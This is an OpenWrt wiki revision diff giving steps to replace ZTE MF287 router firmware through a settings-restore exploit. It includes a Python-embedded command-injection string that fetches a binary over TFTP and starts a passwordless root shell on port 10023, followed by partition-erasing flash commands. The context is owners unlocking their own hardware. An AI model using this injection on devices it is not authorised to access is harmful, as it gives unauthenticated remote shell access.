Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
Next revision
Previous revision
Next revisionBoth sides next revision
toh:zte:mf287 [2024/02/12 11:13] – external edit toh:zte:mf287 [2024/08/07 08:26] – Clarify installation procedure andyboeh
Line 58: Line 58:
  
 ==== Option 1: Install from OEM firmware ==== ==== Option 1: Install from OEM firmware ====
 +<WRAP round important 80%>
 +**Required files**
  
-You need an exploit to get access to the stock firmware. Prepare the following: 
- 
-  * TFTP server - tftpd-hpa on Linux is tested, but tftpd32 should work as well 
   * Static build of busybox for ARM, e.g. from https://busybox.net/downloads/binaries/1.21.1/ (Pick ARMV7 version)   * Static build of busybox for ARM, e.g. from https://busybox.net/downloads/binaries/1.21.1/ (Pick ARMV7 version)
 +  * exploit.dat from https://cloud.aboehler.at/index.php/s/GDixspLf4jgg8pT. Please use the password ''%%nzjmaBARoM%%''
 +  * OpenWrt factory image - this is **not** listed in the table above. Please download it from [[https://firmware-selector.openwrt.org/?version=23.05.4&target=ipq40xx%2Fgeneric&id=zte_mf287pro]]
 +</WRAP>
 +
 +Then do the following preparatory steps:
 +
 +  * Set up a TFTP server - tftpd-hpa on Linux is tested, but tftpd32 should work as well
   * Rename busybox to "telnetd" and put it to your TFTP root directory   * Rename busybox to "telnetd" and put it to your TFTP root directory
-  * Download the exploit.dat from https://cloud.aboehler.at/index.php/s/GDixspLf4jgg8pT. Please use the password ''%%nzjmaBARoM%%'' +  * Put the OpenWrt **factory.bin** file to your TFTP directory as zte.bin
-  * Put the OpenWrt factory.bin file to your TFTP directory as zte.bin+
   * Assign your computer the IP address 192.168.0.22   * Assign your computer the IP address 192.168.0.22
  
Line 72: Line 77:
   - Log in to the web interface of your router, go to settings restore and use the file "exploit.dat" as the file to restore. Accept the message that the router is going to be restarted - don't worry, it won't restart.   - Log in to the web interface of your router, go to settings restore and use the file "exploit.dat" as the file to restore. Accept the message that the router is going to be restarted - don't worry, it won't restart.
   - Watch your TFTP server serving the file "telnetd"   - Watch your TFTP server serving the file "telnetd"
-  - Use a Telnet client and connect to 192.168.0.1 +  - Use a Telnet client and connect to 192.168.0.1 on port 10023 
-  - Login as user "admin" and password "admin"+  - You should be logged in immediately, no password required
   - Execute the following commands to take a backup and to install OpenWrt (NB: Instead of using tftp, you should also be able to use ''%%scp%%'' from the router):   - Execute the following commands to take a backup and to install OpenWrt (NB: Instead of using tftp, you should also be able to use ''%%scp%%'' from the router):
  
 <WRAP round important 80%> <WRAP round important 80%>
-For the MF287Pro, you need to replace ''%%mtd13%%'' with ''%%mtd17%%'' and ''%%mtdblock13%%'' with ''%%mtdblock17%%''!+For the MF287 and MF287+, you need to replace ''%%mtdXX%%'' with ''%%mtd13%%'' and ''%%mtdblockXX%%'' with ''%%mtdblock13%%''
 +For the MF287Pro, you need to replace ''%%mtdXX%%'' with ''%%mtd17%%'' and ''%%mtdblockXX%%'' with ''%%mtdblock17%%''!
 </WRAP> </WRAP>
  
 <WRAP round important 80%> <WRAP round important 80%>
 Please double-check the partition number by running ''%%cat /proc/mtd%%'' and looking for the line named ''%%rootfs%%''. Use this mtd number. Please double-check the partition number by running ''%%cat /proc/mtd%%'' and looking for the line named ''%%rootfs%%''. Use this mtd number.
 +</WRAP>
 +
 +<WRAP round important 80%>
 +Please double-check that you flash the correct file. The factory image is **not** part of the table above, but it can be downloaded from the [[https://firmware-selector.openwrt.org/?version=23.05.4&target=ipq40xx%2Fgeneric&id=zte_mf287pro|Firmware Selector]].
 </WRAP> </WRAP>
  
Line 93: Line 103:
 tftp -g -r zte.bin 192.168.0.22 tftp -g -r zte.bin 192.168.0.22
 cat /proc/driver/sensor_id cat /proc/driver/sensor_id
-flash_erase /dev/mtd13 0 0 +flash_erase /dev/mtdXX 0 0 
-dd if=zte.bin of=/dev/mtdblock13 bs=131072+dd if=zte.bin of=/dev/mtdblockXX bs=131072
 reboot reboot
 </code> </code>
Line 164: Line 174:
             return False             return False
                  
-        exploit = ";zte_debug.sh 192.168.0.22 telnetd; sleep 3600\n"+        exploit = ";zte_debug.sh 192.168.0.22 telnetd; /tmp/telnetd -l /bin/sh -p 10023; sleep 3600\n"
         out = bytearray()         out = bytearray()
         for char in exploit:         for char in exploit:
  • Last modified: 2024/12/09 10:32
  • by colo